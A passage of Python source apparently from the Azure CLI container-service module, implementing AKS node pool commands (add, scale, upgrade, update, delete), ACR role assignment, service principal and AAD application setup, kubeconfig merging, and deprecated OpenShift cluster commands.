"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cmd, assignee, registry.id, detach, is_service_principal)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_fips_image=False,
snapshot_id=None,
no_wait=False,
aks_custom_headers=None):
AgentPool = cmd.get_models('AgentPool',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
# load model CreationData
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
if snapshot_id:
snapshot = get_snapshot_by_snapshot_id(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
enable_fips=enable_fips_image,
creation_data=creationData
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
agent_pool,
headers=aks_custom_headers,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False,
aks_custom_headers=None,
snapshot_id=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
# Note: we exclude this option because node image upgrade can't accept nodepool put fields like max surge
if max_surge and node_image_only:
raise MutuallyExclusiveArgumentError(
'Conflicting flags. Unable to specify max-surge with node-image-only.'
'If you want to use max-surge with a node image upgrade, please first '
'update max-surge using "az aks nodepool update --max-surge".'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
# load model CreationData
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
creationData = None
if snapshot_id:
snapshot = get_snapshot_by_snapshot_id(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
# pylint: disable=too-many-boolean-expressions
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False,
aks_custom_headers=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not scale_down_mode and not mode and not max_surge and
labels is None and node_taints is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode or '
'"--labels"or "--node-taints"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cmd,
assignee,
registry_id,
detach=False,
is_service_principal=True):
if detach:
if not _delete_role_assignments(cmd.cli_ctx,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cmd,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal, aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cmd,
cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[
app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
NetworkProfile = cmd.get_models('NetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(
identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(
vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(
compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
poller = client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
# Grant vnet permission to system assigned identity RIGHT AFTER
# the cluster is put, this operation can reduce latency for the
# role assignment take effect
if need_grant_vnet_permission_to_cluster_identity:
instant_cluster = client.get(resource_group_name, name)
if not _add_role_assignment(cmd, 'Network Contributor',
instant_cluster.identity.principal_id, scope=vnet_subnet_id,
is_service_principal=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(poller)
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
